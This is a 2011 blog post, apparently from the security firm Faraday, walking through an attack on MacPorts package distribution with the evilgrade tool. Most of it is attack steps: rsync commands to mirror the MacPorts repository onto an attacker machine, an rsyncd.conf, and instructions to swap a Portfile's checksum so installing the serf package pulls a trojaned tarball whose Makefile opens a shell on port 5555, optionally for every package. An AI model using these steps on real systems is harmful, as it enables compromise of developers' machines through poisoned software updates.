Pwning Mac OS X with evilgrade + MacPorts

Faraday News

Published in

Faraday

3 min readJul 7, 2011

The idea of this post is to show the flaws in the packages distribution of the project MacPorts for Mac OS X

The MacPorts use:

a) To update your repository rsync server

b) The packages are distributed via http / ftp

c) Before installing a new package it is checked with the MD5/SHA1 in the local repository

To perform the attack we need to do the following tasks:

1) Prepare the rsync server on the attacker’s machine (192.168.10.133) with all the files of rsync.macports.org:

mkdir -p /dev/evilgrade/release/ports

mkdir -p /dev/evilgrade/release/base

#Get the files from rsync.macports.org

/usr/bin/rsync -rtzv — delete-after — exclude=/PortIndex* rsync://rsync.macports.org/release/ports/ /dev/evilgrade/release/ports/

/usr/bin/rsync -rtzv — delete-after — exclude=/PortIndex* rsync://rsync.macports.org/release/base/ /dev/evilgrade/release/base/

2) Configure the file /etc/rsyncd.conf:

max connections = 20

log file = /var/log/rsync.log

timeout = 300

[release]

comment = Stuff

path = /dev/evilgrade/release/

read only = yes

list = yes

uid = nobody

gid = nogroup

# auth users = craig

# secrets file = /etc/rsyncd.secrets

hosts allow = 192.168.10.0/24 #change for your subnet

3) Then start the rsync server /etc/init.d/rsync start

4) In this case we will attack the package serf in the category www. The idea is that when you install this package we create a listener shell port 5555

We have to edit the repository file /dev/evilgrade/release/ports/www/serf/Portfile and change checksums md5 with the hash of our payload/agent found in /evilgrade/agent/serf-0.7.2. tar.bz2

You could also prepare the repository for all “Porfiles” point to the same package with the same md5 so any installation which infect the victim port

This agent has a line (132) in Makefile.in to leave a shell at port 5555